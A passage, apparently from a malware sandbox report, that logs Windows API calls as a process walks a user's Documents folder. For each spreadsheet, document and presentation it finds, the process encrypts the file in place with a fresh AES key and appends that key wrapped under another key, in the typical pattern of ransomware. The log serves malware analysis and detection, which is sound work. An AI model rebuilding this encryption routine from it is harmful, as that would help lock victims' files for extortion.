lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.176] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.177] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.177] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.177] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.177] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.177] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x13a8e, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x13a8e, lpOverlapped=0x0) returned 1 [0155.178] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.178] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x13a8e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x13a90) returned 1 [0155.179] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.179] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13a90, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x13a90, lpOverlapped=0x0) returned 1 [0155.179] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.179] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.179] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.179] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.179] CloseHandle (hObject=0x188) returned 1 [0155.194] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.198] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.198] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.198] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.198] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cYqaOhaQ8.xlsx", dwFileAttributes=0x80) returned 1 [0155.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cYqaOhaQ8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyqaohaq8.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.199] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=73100) returned 1 [0155.199] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=73100) returned 1 [0155.199] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x11c6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.199] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.200] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.200] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.200] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.200] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.200] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11d8c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x11d8c, lpOverlapped=0x0) returned 1 [0155.201] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.201] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x11d8c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x11d90) returned 1 [0155.201] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.201] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11d90, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x11d90, lpOverlapped=0x0) returned 1 [0155.202] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.202] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.202] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.202] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.202] CloseHandle (hObject=0x188) returned 1 [0155.219] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.223] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.223] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.223] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.223] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.224] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dG45QiNOzG91cn1.docx", dwFileAttributes=0x80) returned 1 [0155.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dG45QiNOzG91cn1.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dg45qinozg91cn1.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.224] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=27490) returned 1 [0155.224] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=27490) returned 1 [0155.224] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x6a40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.224] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.225] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.225] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.225] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.225] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.225] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6b62, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x6b62, lpOverlapped=0x0) returned 1 [0155.225] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.225] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x6b62, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x6b70) returned 1 [0155.226] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.226] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6b70, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x6b70, lpOverlapped=0x0) returned 1 [0155.226] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.226] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.226] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.226] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.226] CloseHandle (hObject=0x188) returned 1 [0155.254] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.258] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.258] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.258] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gi1MeF79iCYAl7 2pLXj.xlsx", dwFileAttributes=0x80) returned 1 [0155.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gi1MeF79iCYAl7 2pLXj.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gi1mef79icyal7 2plxj.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.259] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=44132) returned 1 [0155.259] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=44132) returned 1 [0155.259] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xab42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.259] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.259] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.260] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.260] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.260] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.260] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xac64, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xac64, lpOverlapped=0x0) returned 1 [0155.260] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.260] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xac64, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xac70) returned 1 [0155.261] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.261] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xac70, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xac70, lpOverlapped=0x0) returned 1 [0155.261] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.261] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.261] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.261] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.261] CloseHandle (hObject=0x188) returned 1 [0155.278] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.283] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.283] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.283] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HNYiDAHKLnzhk.xlsx", dwFileAttributes=0x80) returned 1 [0155.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HNYiDAHKLnzhk.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hnyidahklnzhk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.283] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=76591) returned 1 [0155.283] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=76591) returned 1 [0155.284] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x12a0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.284] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.284] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.284] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.284] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.284] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.284] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12b2f, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x12b2f, lpOverlapped=0x0) returned 1 [0155.285] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.286] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b2f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b30) returned 1 [0155.286] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.286] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12b30, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x12b30, lpOverlapped=0x0) returned 1 [0155.286] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.286] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.286] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.286] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.286] CloseHandle (hObject=0x188) returned 1 [0155.305] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.310] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.310] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.310] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.310] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.310] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHr9aK y3kXfp1lv-Kk.pptx", dwFileAttributes=0x80) returned 1 [0155.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHr9aK y3kXfp1lv-Kk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jhr9ak y3kxfp1lv-kk.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.311] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=4713) returned 1 [0155.311] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=4713) returned 1 [0155.311] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1147, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.311] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.312] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.312] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.312] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.312] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.313] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1269, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x1269, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.313] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x1269, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x1270) returned 1 [0155.313] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.313] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x1270, lpOverlapped=0x0) returned 1 [0155.313] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.313] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.313] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.313] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.313] CloseHandle (hObject=0x188) returned 1 [0155.331] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.335] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.336] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.336] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.336] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.336] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jmlszne72fLMiaGKg.xlsx", dwFileAttributes=0x80) returned 1 [0155.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jmlszne72fLMiaGKg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js 